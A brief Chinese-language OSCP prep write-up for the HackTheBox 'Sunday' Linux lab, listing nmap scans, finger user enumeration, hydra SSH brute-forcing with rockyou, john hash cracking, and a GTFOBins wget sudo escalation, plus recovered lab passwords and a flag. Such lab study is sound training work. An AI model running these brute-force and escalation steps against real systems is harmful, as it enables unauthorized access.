OSCP备考_0x10_HackThBox靶机_Linux_Sunday
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)
nmap -sU --top-ports 100 10.129.252.243(扫描UDP)
使用finger进行用户枚举
挡案下载地址:https://pentestmonkey.net/tools/user-enumeration/finger-user-enum
./finger-user-enum.pl -t 10.129.252.243 -U /usr/share/wordlists/my_list/names.txt -p 79
找到这下面两个有SSH登陆记录 那就直接爆破SSH看看
hydra -l sunny -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f
密钥是sunday
hydra -l sammy -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f
开始登入SSH
先查看history
可以使用john去爆破密码$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB,密钥:cooldude!
john s.hash --wordlist=/usr/share/wordlists/rockyou.txt
sudo -l
https://gtfobins.github.io/gtfobins/wget/#sudo
1281b10cab59bd490d02f489f71abda1
